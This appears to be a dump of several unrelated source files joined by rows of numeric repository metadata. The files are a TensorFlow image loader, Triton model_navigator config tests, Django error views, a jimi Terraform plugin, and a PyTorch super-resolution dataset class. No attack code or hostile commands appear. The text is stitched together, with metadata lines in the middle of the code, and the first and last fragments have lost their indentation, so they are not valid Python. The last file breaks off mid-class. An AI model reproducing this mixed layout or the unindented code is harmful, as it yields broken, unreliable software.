def preprocess_input_celeba(path):
FILE = tf.io.read_file(path)
img = tf.image.decode_jpeg(FILE)
img = tf.image.convert_image_dtype(img, tf.float32)
img = tf.image.resize_with_pad(img, 256, 256)
label = tf.strings.split(path, os.path.sep)[-2]
if self.config.model.final_activation == "tanh":
img, _ = self.normalize(img, None)
return img, label
def prepare_for_testing(
ds,
cache=self.config.data_loader.cache,
shuffle=self.config.data_loader.shuffle,
shuffle_buffer_size=1000,
):
if cache:
if isinstance(cache, str):
ds = ds.cache(cache)
else:
ds = ds.cache()
if shuffle:
ds = ds.shuffle(shuffle_buffer_size)
return ds
# butterfly dataset
if self.config.data_loader.dataset == "butterflies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# guppy dataset
elif self.config.data_loader.dataset == "guppies":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*_*/*"), shuffle=False, seed=42
)
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "[!a-z][!a-z]/*"), shuffle=False, seed=42
)
ds = list_data.map(
preprocess_input, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# celeba dataset
elif self.config.data_loader.dataset == "celeba":
if self.config.data_loader.use_real is True:
if self.config.data_loader.use_generated is True:
raise NotImplementedError
else:
list_data = tf.data.Dataset.list_files(
str(self.data_dir / "*/*"), shuffle=False, seed=42
)
else:
raise NotImplementedError
ds = list_data.map(
preprocess_input_celeba,
num_parallel_calls=tf.data.experimental.AUTOTUNE,
)
else:
raise NotImplementedError
plot_ds = prepare_for_testing(ds)
return plot_ds
@staticmethod
    def normalize(input_image, real_image):
        # Normalize from [0, 1] to [-1, 1] when the model uses a tanh output.
        input_image = (input_image / 0.5) - 1
        # Explicit None check: evaluating a tf.Tensor for truthiness inside a
        # tf.data graph is invalid and would raise an error.
        if real_image is not None:
            real_image = (real_image / 0.5) - 1
        return input_image, real_image
@staticmethod
def resize(input_image, real_image, height=256, width=256):
input_image = tf.image.resize(
input_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR
)
real_image = tf.image.resize(
real_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR
)
return input_image, real_image
@staticmethod
def random_crop(input_image, real_image, img_height, img_width):
stacked_image = tf.stack([input_image, real_image], axis=0)
cropped_image = tf.image.random_crop(
stacked_image, size=[2, img_height, img_width, 3]
)
return cropped_image[0], cropped_image[1]
@tf.function()
def random_jitter(self, input_image, real_image):
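        # Augmentation: upscale to 384x384, randomly crop back to the model's
        # input shape, then randomly mirror; input and target images are
        # transformed together so they stay aligned.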
input_image, real_image = self.resize(input_image, real_image, 384, 384)
# randomly cropping to 256 x 256 x 3
input_image, real_image = self.random_crop(
input_image,
real_image,
self.config.model.input_shape[0],
self.config.model.input_shape[1],
)
if tf.random.uniform((), dtype=tf.float16) > 0.5:
# random mirroring
input_image = tf.image.flip_left_right(input_image)
real_image = tf.image.flip_left_right(real_image)
return input_image, real_image
| 36.68894 | 87 | 0.538969 | 1,806 | 15,923 | 4.553156 | 0.112957 | 0.065669 | 0.074912 | 0.107017 | 0.825003 | 0.789979 | 0.757388 | 0.747659 | 0.747659 | 0.730026 | 0 | 0.016231 | 0.361552 | 15,923 | 433 | 88 | 36.773672 | 0.792642 | 0.052817 | 0 | 0.707463 | 0 | 0 | 0.015348 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056716 | false | 0 | 0.014925 | 0 | 0.131343 | 0.002985 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
747b7b2afc29617b4b889654e9aae917761378af | 15,656 | py | Python | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 49 | 2021-04-09T18:32:07.000Z | 2022-03-29T07:32:24.000Z | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2021-07-13T09:00:12.000Z | 2021-11-15T17:16:35.000Z | tests/unit/test_triton_model_config.py | triton-inference-server/model_navigator | ec2915f4f5a6b9ed7e1b59290899e2b56b98bcc7 | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2021-04-09T18:31:56.000Z | 2022-03-01T08:08:04.000Z | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
from tempfile import TemporaryDirectory
import numpy as np
import pytest
from model_navigator.common.config import TensorRTCommonConfig
from model_navigator.model import Model, ModelSignatureConfig
from model_navigator.tensor import TensorSpec
from model_navigator.triton.config import (
Batching,
DeviceKind,
TritonBatchingConfig,
TritonCustomBackendParametersConfig,
TritonDynamicBatchingConfig,
TritonModelInstancesConfig,
TritonModelOptimizationConfig,
)
from model_navigator.triton.model_config import TritonModelConfigGenerator
CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES = (
128,
"model.pt",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, 224, 224), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_DYNAMIC_AXES = (
128,
"model.pt",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, -1, -1), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES = (
128,
"model.plan",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, 224, 224), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES = (
128,
"model.plan",
ModelSignatureConfig(
inputs={"i__0": TensorSpec("i__0", shape=(-1, 3, -1, -1), dtype=np.dtype("float16"))},
outputs={"o__1": TensorSpec("o__1", shape=(-1, 1000), dtype=np.dtype("float16"))},
),
)
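# Each case above is (max_batch_size, model_filename, ModelSignatureConfig);
# a -1 in a tensor shape marks the batch axis or a dynamic spatial axis.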
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TORCHSCRIPT_SIMPLE_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_for_torchscript(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_for_tensorrt_plan(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
# assert parsed_model_config_generator.backend_parameters_config == backend_parameters_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_static_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.STATIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_disabled_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DISABLED)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
batching_config.max_batch_size = 0
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_dynamic_batching(monkeypatch, max_batch_size, model_filename, signature):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DYNAMIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig()
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
dynamic_batching_config.preferred_batch_sizes = [max_batch_size]
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
@pytest.mark.parametrize(
"max_batch_size,model_filename,signature",
[CASE_TENSORRT_PLAN_SIMPLE_IMAGE_MODEL_WITH_STATIC_AXES, CASE_TENSORRT_PLAN_IMAGE_MODEL_WITH_DYNAMIC_AXES],
)
def test_model_config_parsing_signature_with_dynamic_batching_configured(
monkeypatch, max_batch_size, model_filename, signature
):
with TemporaryDirectory() as temp_dir:
temp_dir = Path(temp_dir)
# create dummy triton model repo structure
model_path = temp_dir / "1" / model_filename
model_path.parent.mkdir(parents=True, exist_ok=True)
with model_path.open("w"):
pass
config_path = temp_dir / "config.pbtxt"
src_model = Model("dummy", model_path, signature_if_missing=signature)
batching_config = TritonBatchingConfig(max_batch_size=max_batch_size, batching=Batching.DYNAMIC)
optimization_config = TritonModelOptimizationConfig()
tensorrt_common_config = TensorRTCommonConfig()
dynamic_batching_config = TritonDynamicBatchingConfig(preferred_batch_sizes=[1, 2], max_queue_delay_us=100)
instances_config = TritonModelInstancesConfig({DeviceKind.GPU: 1})
backend_parameters_config = TritonCustomBackendParametersConfig()
initial_model_config_generator = TritonModelConfigGenerator(
src_model,
batching_config=batching_config,
optimization_config=optimization_config,
tensorrt_common_config=tensorrt_common_config,
dynamic_batching_config=dynamic_batching_config,
instances_config=instances_config,
backend_parameters_config=backend_parameters_config,
)
initial_model_config_generator.save(config_path)
parsed_model_config_generator = TritonModelConfigGenerator.parse_triton_config_pbtxt(config_path)
assert parsed_model_config_generator.batching_config == batching_config
assert parsed_model_config_generator.model.signature == src_model.signature
assert parsed_model_config_generator.optimization_config == optimization_config
assert parsed_model_config_generator.dynamic_batching_config == dynamic_batching_config
assert parsed_model_config_generator.instances_config == instances_config
| 47.586626 | 119 | 0.756515 | 1,713 | 15,656 | 6.466433 | 0.095738 | 0.073305 | 0.084861 | 0.082152 | 0.897535 | 0.897535 | 0.891035 | 0.891035 | 0.876411 | 0.874063 | 0 | 0.008837 | 0.176035 | 15,656 | 328 | 120 | 47.731707 | 0.849845 | 0.058763 | 0 | 0.804598 | 0 | 0 | 0.034251 | 0.015902 | 0 | 0 | 0 | 0 | 0.10728 | 1 | 0.022989 | false | 0.022989 | 0.034483 | 0 | 0.057471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
776919ae875614f3c35f35d47f9d9c811af34633 | 195 | py | Python | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | foodgram/views.py | 4dragunov/foodgram-project | 7a5691522047fe6715e1e560c17dcf77852558fc | [
"MIT"
] | null | null | null | from django.shortcuts import render
def page_not_found(request, exception):
    return render(request, 'misc/404.html', status=404)
def server_error(request):
    return render(request, 'misc/500.html', status=500)
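# Hedged wiring note (the project's root urls.py is not shown here): Django only
# routes errors to these views when the root URLconf declares
#     handler404 = 'foodgram.views.page_not_found'
#     handler500 = 'foodgram.views.server_error'
# The explicit status kwargs above ensure the error pages are not served with 200.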
| 19.5 | 43 | 0.748718 | 27 | 195 | 5.296296 | 0.666667 | 0.167832 | 0.265734 | 0.321678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0.138462 | 195 | 9 | 44 | 21.666667 | 0.815476 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
77fd9ffcb73e5a1c05a856e017eb4598de9bc638 | 3,062 | py | Python | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | null | null | null | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | null | null | null | models/action.py | z1pti3/jimiPlugn-terraform | d0fafaa22287ed021569c33f07de079c900c95ca | [
"Apache-2.0"
] | 2 | 2021-11-24T12:21:54.000Z | 2022-02-14T23:43:40.000Z | from pathlib import Path
import uuid
from python_terraform import Terraform
import jimi
class _terraformInit(jimi.action._action):
terraform_dir = str()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
return_code, stdout, stderr = t.init()
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr }
class _terraformPlan(jimi.action._action):
terraform_dir = str()
terraform_vars = dict()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_vars = jimi.helpers.evalDict(self.terraform_vars,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
out = str(uuid.uuid4())
return_code, stdout, stderr = t.plan(var=terraform_vars,out=out)
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr, "plan_out" : out }
class _terraformApply(jimi.action._action):
terraform_dir = str()
terraform_vars = dict()
terraform_plan = str()
def doAction(self,data):
terraform_dir = jimi.helpers.evalString(self.terraform_dir,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_plan = jimi.helpers.evalString(self.terraform_plan,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
terraform_vars = jimi.helpers.evalDict(self.terraform_vars,{"data" : data["flowData"], "eventData" : data["eventData"], "conductData" : data["conductData"], "persistentData" : data["persistentData"] })
if not jimi.helpers.safeFilepath(str(Path(terraform_dir)),"data/temp"):
return { "result" : False, "rc" : 403, "msg" : "Invalid terraform directory." }
t = Terraform(working_dir=str(Path(terraform_dir)))
if terraform_plan:
return_code, stdout, stderr = t.apply(terraform_plan,var=terraform_vars)
else:
return_code, stdout, stderr = t.apply(var=terraform_vars)
return { "result" : True, "rc" : return_code, "data" : stdout, "error": stderr }
| 62.489796 | 212 | 0.666231 | 339 | 3,062 | 5.879056 | 0.159292 | 0.090316 | 0.048169 | 0.075263 | 0.869042 | 0.828901 | 0.786754 | 0.786754 | 0.786754 | 0.738585 | 0 | 0.003953 | 0.173743 | 3,062 | 48 | 213 | 63.791667 | 0.783794 | 0 | 0 | 0.585366 | 0 | 0 | 0.223057 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.097561 | 0 | 0.536585 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
7ae1ebeaf832e61a69d8b6ab70defc13eff5c1b0 | 12,547 | py | Python | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 9 | 2021-03-29T12:32:37.000Z | 2022-01-16T15:44:27.000Z | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 2 | 2021-07-05T03:07:26.000Z | 2021-07-15T13:22:26.000Z | data/dataset.py | jiaming-wang/MIP | 867b7359d958d3d32de8e7b1a3f6256e218eb7f6 | [
"MIT"
] | 1 | 2021-11-05T16:03:35.000Z | 2021-11-05T16:03:35.000Z | #!/usr/bin/env python
# coding=utf-8
'''
@Author: wjm
@Date: 2019-10-23 14:57:22
@LastEditTime: 2020-06-30 19:31:07
@Description: file content
'''
import torch.utils.data as data
import torch, random, os
import numpy as np
from os import listdir
from os.path import join
from PIL import Image, ImageOps
from random import randrange
def is_image_file(filename):
return any(filename.endswith(extension) for extension in ['.jpg', '.JPG', '.jpeg', '.JPEG', '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',])
def load_img(filepath):
img = Image.open(filepath).convert('RGB')
#img = Image.open(filepath)
#y, _, _ = img.split()
return img
def rescale_img(img_in, scale):
size_in = img_in.size
new_size_in = tuple([int(x * scale) for x in size_in])
img_in = img_in.resize(new_size_in, resample=Image.BICUBIC)
return img_in
def get_patch(img_in, img_tar, img_bic, patch_size, scale, ix=-1, iy=-1):
(ih, iw) = img_in.size
(th, tw) = (scale * ih, scale * iw)
patch_mult = scale #if len(scale) > 1 else 1
tp = patch_mult * patch_size
ip = tp // scale
if ix == -1:
ix = random.randrange(0, iw - ip + 1)
if iy == -1:
iy = random.randrange(0, ih - ip + 1)
(tx, ty) = (scale * ix, scale * iy)
img_in = img_in.crop((iy,ix,iy + ip, ix + ip))
img_tar = img_tar.crop((ty,tx,ty + tp, tx + tp))
img_bic = img_bic.crop((ty,tx,ty + tp, tx + tp))
info_patch = {
'ix': ix, 'iy': iy, 'ip': ip, 'tx': tx, 'ty': ty, 'tp': tp}
return img_in, img_tar, img_bic, info_patch
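# Added commentary on the coordinate math above (mirrored in get_patch_ref below):
# tp is the patch size in HR/target space and ip = tp // scale is the matching size
# in LR/input space. For example, with scale=4 and patch_size=32 the crops are
# 32x32 in the LR image and 128x128 in the HR/bicubic images, anchored at (ix, iy)
# and (scale*ix, scale*iy) respectively, so all three crops cover the same region.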
def get_patch_ref(img_in, img_tar, img_bic, img_in_ref, img_tar_ref, img_bic_ref, patch_size, scale, ix=-1, iy=-1):
(ih, iw) = img_in.size
(th, tw) = (scale * ih, scale * iw)
patch_mult = scale #if len(scale) > 1 else 1
tp = patch_mult * patch_size
ip = tp // scale
if ix == -1:
ix = random.randrange(0, iw - ip + 1)
if iy == -1:
iy = random.randrange(0, ih - ip + 1)
(tx, ty) = (scale * ix, scale * iy)
img_in = img_in.crop((iy,ix,iy + ip, ix + ip))
img_tar = img_tar.crop((ty,tx,ty + tp, tx + tp))
img_bic = img_bic.crop((ty,tx,ty + tp, tx + tp))
img_in_ref = img_in_ref.crop((iy,ix,iy + ip, ix + ip))
img_tar_ref = img_tar_ref.crop((ty,tx,ty + tp, tx + tp))
img_bic_ref = img_bic_ref.crop((ty,tx,ty + tp, tx + tp))
info_patch = {
'ix': ix, 'iy': iy, 'ip': ip, 'tx': tx, 'ty': ty, 'tp': tp}
return img_in, img_tar, img_bic, img_in_ref, img_tar_ref, img_bic_ref, info_patch
def augment(img_in, img_tar, img_bic, flip_h=True, rot=True):
info_aug = {'flip_h': False, 'flip_v': False, 'trans': False}
if random.random() < 0.5 and flip_h:
img_in = ImageOps.flip(img_in)
img_tar = ImageOps.flip(img_tar)
img_bic = ImageOps.flip(img_bic)
info_aug['flip_h'] = True
if rot:
if random.random() < 0.5:
img_in = ImageOps.mirror(img_in)
img_tar = ImageOps.mirror(img_tar)
img_bic = ImageOps.mirror(img_bic)
info_aug['flip_v'] = True
if random.random() < 0.5:
img_in = img_in.rotate(180)
img_tar = img_tar.rotate(180)
img_bic = img_bic.rotate(180)
info_aug['trans'] = True
return img_in, img_tar, img_bic, info_aug
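# Added commentary: each random decision above is applied identically to all three
# images, so the LR input, HR target, and bicubic upsample stay pixel-aligned.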
class Data(data.Dataset):
def __init__(self, image_dir, image_dir_ref, patch_size, upscale_factor, data_augmentation, normalize, transform=None):
super(Data, self).__init__()
self.image_filenames = [join(image_dir, x) for x in listdir(image_dir) if is_image_file(x)]
self.image_filenames_ref = [join(image_dir_ref, x) for x in listdir(image_dir_ref) if is_image_file(x)]
self.patch_size = patch_size
self.upscale_factor = upscale_factor
self.transform = transform
self.data_augmentation = data_augmentation
self.normalize = normalize
def __getitem__(self, index):
target = load_img(self.image_filenames[index])
_, file = os.path.split(self.image_filenames[index])
target = target.crop((0, 0, target.size[0] // self.upscale_factor * self.upscale_factor, target.size[1] // self.upscale_factor * self.upscale_factor))
input = target.resize((int(target.size[0]/self.upscale_factor),int(target.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic = rescale_img(input, self.upscale_factor)
target_ref = load_img(self.image_filenames_ref[index])
_, file_ref = os.path.split(self.image_filenames_ref[index])
target_ref = target_ref.crop((0, 0, target_ref.size[0] // self.upscale_factor * self.upscale_factor, target_ref.size[1] // self.upscale_factor * self.upscale_factor))
input_ref = target_ref.resize((int(target_ref.size[0]/self.upscale_factor),int(target_ref.size[1]/self.upscale_factor)), Image.BICUBIC)
bicubic_ref = rescale_img(input_ref, self.upscale_factor)
input, target, bicubic, input_ref, target_ref, bicubic_ref, _ = get_patch_ref(input,target,bicubic,input_ref,target_ref,bicubic_ref,self.patch_size, self.upscale_factor)
if self.data_augmentation:
input, target, bicubic, _ = augment(input, target, bicubic)
if self.transform:
input = self.transform(input)
bicubic = self.transform(bicubic)
target = self.transform(target)
input_ref = self.transform(input_ref)
bicubic_ref = self.transform(bicubic_ref)
target_ref = self.transform(target_ref)
if self.normalize:
input = input * 2 - 1
bicubic = bicubic * 2 - 1
target = target * 2 - 1
input_ref = input_ref * 2 - 1
bicubic_ref = bicubic_ref * 2 - 1
target_ref = target_ref * 2 - 1
return input, target, bicubic, input_ref, target_ref, bicubic_ref, file, file_ref
def __len__(self):
